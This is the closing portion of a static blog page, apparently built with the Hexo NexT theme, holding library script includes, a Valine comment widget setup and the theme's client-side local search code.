  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: 'nni5jRNG5rVrccV4vzUAzJku-gzGzoHsz',
        appKey: 'kXNW64jbh6grAGbpsqODlFoi',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
